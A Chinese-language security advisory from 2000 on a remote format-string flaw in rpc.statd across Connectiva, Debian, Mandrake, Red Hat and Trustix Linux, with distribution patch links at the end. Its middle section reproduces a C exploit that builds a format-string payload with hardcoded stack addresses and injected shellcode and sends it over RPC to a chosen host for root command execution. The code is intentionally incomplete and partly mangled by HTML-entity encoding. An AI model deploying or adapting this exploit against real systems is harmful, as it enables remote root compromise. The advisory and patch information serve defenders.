发布日期: 2000-7-20

更新日期: 2000-7-20

受影响的系统:
Connectiva Linux 5.0
Connectiva Linux 4.2
Connectiva Linux 4.1
Connectiva Linux 4.0es
Connectiva Linux 4.0
Debian Linux 2.3
Debian Linux 2.2
Linux-Mandrake 7.0
Linux-Mandrake 7.1
RedHat Linux 6.2
RedHat Linux 6.1
RedHat Linux 6.0
Trustix Trustix Secure Linux 1.1
Trustix Trustix Secure Linux 1.0

不受影响系统:
Debian Linux 2.1

描述:
　　很多Linux系统所带的nfs-utils软件包中的rcp.statd程序存在一个安全漏洞。通过设置特殊的格式化字符串，并在某个buffer中提供可执行代码，可能允许远程攻击者覆盖rpc.statd堆栈中的某个返回地址，远程执行任意命令是可能的。由于rpc.statd通常是以root身份运行，而且没有丢弃root权限，因此溢出代码会以root身份执行。

　　Debian, Red Hat ，Connectiva 和Mandrake Linux已经发布了安全公告并提供了安全补丁。其他运行rpc.statd的Linux也存在这个问题。幸运的是，缺省情况下很多Linux并没有启动rpc.statd服务。

$#@60;* 来源： Jeff Uphoff Chris Evans $#@60;chris@ferret.lmh.ox.ac.uk$#@62; *$#@62;

测试程序：


警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*
* Slightly dysfunctional rpc.statd exploit
* for all the dysfunctional script kiddies out there
*
* Author: drow, 07/2000
*
* And just for kicks...
* Greets:
* Chris Evans, whose fault all this is
* whoever wrote the old solaris statd exploit I ripped the RPC code out of
* $#@60;james$#@62; send out greetz to all the 1337 D3B14N H4X0R2!!!!
* and THEM (THEY know who THEY are)
*
*
* This is dedicated to Joel Klecker. Those who knew him know why.
*
*/

#include $#@60;sys/types.h$#@62;
#include $#@60;sys/time.h$#@62;
#include $#@60;stdio.h$#@62;
#include $#@60;string.h$#@62;
#include $#@60;netdb #@62;
#include $#@60;rpc/rpc.h$#@62;
#include $#@60;rpcsvc/sm_inter.h$#@62;
#include $#@60;sys/socket.h$#@62;

void usage(char *s) {
printf("Usage: %s host [-nopoke]\n", s);
exit(0);
}

extern char shell[];

main(int argc, char *argv[]) {
CLIENT *cl;
enum clnt_stat stat;
struct timeval tm;
struct mon monreq;
struct sm_stat_res monres;
struct hostent *hp;
struct sockaddr_in target;
int sd, i, noplen=strlen(nop), nopoke=0;
char *ptr=code, *p2, code[4096];

if (argc $#@60; 2)
usage(argv[0]);
if (argc $#@62; 2)
nopoke = 1;

/* Alignment */
strcpy(ptr, "AAA");
ptr += strlen(ptr);

/* Target to write to! */
*(unsigned long *)(ptr) = 0x7fffeb04;
ptr += sizeof(unsigned long);

/* pad */
*(unsigned long *)(ptr) = 0x11111111;
ptr += sizeof(unsigned long);

/* Target Two (two higher in memory probably) */
*(unsigned long *)(ptr) = 0x7fffeb06;
ptr += sizeof(unsigned long);

for(i = 0; i $#@60; 46-1; i++) {
strcpy(ptr, "%12d");
ptr += strlen(ptr);
}

if(!nopoke) {
/* Value to write - amount written */
/* Guess a bit - remember to leave a lot of padding, and be lucky on alignment */
/* Dont correct for IP address! Forced to localhost by stat code - same length. */
#define HIGH 0x7fff
#define LOW 0xeecc
sprintf(ptr, "%%%dd%%hn", HIGH - 12*45
- strlen("STAT_FAIL to 127.0.0.1 for SM_MON of AAABBBB1111CCCC"));
ptr += strlen(ptr);

sprintf(ptr, "%%%dd%%hn", (LOW - HIGH) % 65536);
ptr += strlen(ptr);

/* CODE */
p2 = shell;
while(*p2)
*(ptr++) = *(p2++);
}
*(ptr++) = 0;

memset(&monreq, 0, sizeof(monreq));
monreq.mon_id.my_id.my_name="localhost";
monreq.mon_id.my_id.my_prog=0;
monreq.mon_id.my_id.my_vers=0;
monreq.mon_id.my_id.my_proc=0;
monreq.mon_id.mon_name= code /*code*/;

if ((hp=gethostbyname(argv[1])) == NULL) {
printf("Cant resolve %s\n", argv[1]);
exit(0);
}
target.sin_family=AF_INET;
target.sin_addr.s_addr=*(u_long *)hp-$#@62;h_addr;
target.sin_port=0; /* ask portmap */
sd=RPC_ANYSOCK;

tm.tv_sec=10;
tm.tv_usec=0;
if ((cl=clntudp_create(&target, SM_PROG, SM_VERS, tm, &sd)) == NULL) {
clnt_pcreateerror("clnt_create");
exit(0);
}
stat=clnt_call(cl, SM_MON, xdr_mon, (char *)&monreq, xdr_sm_stat_res,
(char *)&monres, tm);
if (stat != RPC_SUCCESS)
clnt_perror(cl, "clnt_call");
else
printf("stat_res = %d.\n", monres.res_stat);
clnt_destroy(cl);
}

--------------------------------------------------------------------------------
建议:
Connectiva Linux 5.0:

Connectiva RPM nfs-utils-0.1.9.1-3cl.i386.rpm 5.0
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/nfs-utils-0.1.9.1-3cl.i386.rpm

Connectiva Linux 4.2:

Connectiva RPM nfs-utils-0.1.9.1-3cl.i386.rpm 4.2
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/i386/nfs-utils-0.1.9.1-3cl.i386.rpm

Connectiva Linux 4.1:

Connectiva RPM nfs-utils-0.1.9.1-3cl.i386.rpm 4.1
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/i386/nfs-utils-0.1.9.1-3cl.i386.rpm

Connectiva Linux 4.0es:

Connectiva RPM nfs-utils-0.1.9.1-3cl.i386.rpm 4.0es
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0es/i386/nfs-utils-0.1.9.1-3cl.i386.rpm

Connectiva Linux 4.0:

Connectiva RPM nfs-utils-0.1.9.1-3cl.i386.rpm 4.0
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.0/i386/nfs-utils-0.1.9.1-3cl.i386.rpm

Debian Linux 2.3 sparc:

Debian RPM nfs-common_0.1.9.1-1.deb sparc 2.3
http://http.us.debian.org/debian/dists/unstable/main/binary-sparc/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.3 powerpc:

Debian RPM nfs-common_0.1.9.1-1.deb powerpc 2.3
http://http.us.debian.org/debian/dists/unstable/main/binary-powerpc/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.3:

Debian RPM nfs-common_0.1.9.1-1.deb Intel 2.3
http://http.us.debian.org/debian/dists/unstable/main/binary-i386/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.2 sparc:

Debian RPM nfs-common_0.1.9.1-1.deb sparc 2.2
http://http.us.debian.org/debian/dists/potato/main/binary-sparc/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.2 powerpc:

Debian RPM nfs-common_0.1.9.1-1.deb powerpc 2.2
http://http.us.debian.org/debian/dists/potato/main/binary-powerpc/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.2 alpha:

Debian RPM nfs-common_0.1.9.1-1.deb Alpha 2.2
http://http.us.debian.org/debian/dists/potato/main/binary-alpha/net/nfs-common_0.1.9.1-1.deb

Debian Linux 2.2:

Debian RPM nfs-common_0.1.9.1-1.deb Intel 2.2
http://http.us.debian.org/debian/dists/potato/main/binary-i386/net/nfs-common_0.1.9.1-1.deb

Linux-Mandrake 7.0:

ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.0/RPMS/nfs-utils-0.1.9.1-3mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.0/RPMS/nfs-utils-clients-0.1.9.1-3mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.0/SRPMS/nfs-utils-0.1.9.1-3mdk.src.rpm

Linux-Mandrake 7.1:

ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.1/RPMS/nfs-utils-0.1.9.1-3mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.1/RPMS/nfs-utils-clients-0.1.9.1-3mdk.i586.rpm
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates/7.1/SRPMS/nfs-utils-0.1.9.1-3mdk.src.rpm

RedHat Linux 6.2 sparc:

RedHat RPM nfs-utils-0.1.9.1-1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/nfs-utils-0.1.9.1-1.sparc.rpm

RedHat Linux 6.2 i386:

Redhat RPM nfs-utils-0.1.9.1-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/nfs-utils-0.1.9.1-1.i386.rpm

RedHat Linux 6.2 alpha:

RedHat RPM nfs-utils-0.1.9.1-1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/nfs-utils-0.1.9.1-1.alpha.rpm

RedHat Linux 6.1 sparc:

RedHat RPM nfs-utils-0.1.9.1-1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/nfs-utils-0.1.9.1-1.sparc.rpm

RedHat Linux 6.1 i386:

Redhat RPM nfs-utils-0.1.9.1-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/nfs-utils-0.1.9.1-1.i386.rpm

RedHat Linux 6.1 alpha:

RedHat RPM nfs-utils-0.1.9.1-1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/nfs-utils-0.1.9.1-1.alpha.rpm

RedHat Linux 6.0 sparc:

RedHat RPM nfs-utils-0.1.9.1-1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/nfs-utils-0.1.9.1-1.sparc.rpm

RedHat Linux 6.0 i386:

Redhat RPM nfs-utils-0.1.9.1-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/nfs-utils-0.1.9.1-1.i386.rpm

RedHat Linux 6.0 alpha:

RedHat RPM nfs-utils-0.1.9.1-1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/nfs-utils-0.1.9.1-1.alpha.rpm

Trustix Trustix Secure Linux 1.1:

Trustix RPM nfs-utils-0.1.9.1-1tr.i586.rpm
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/

Trustix Trustix Secure Linux 1.0:

Trustix RPM nfs-utils-0.1.9.1-1tr.i586.rpm
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/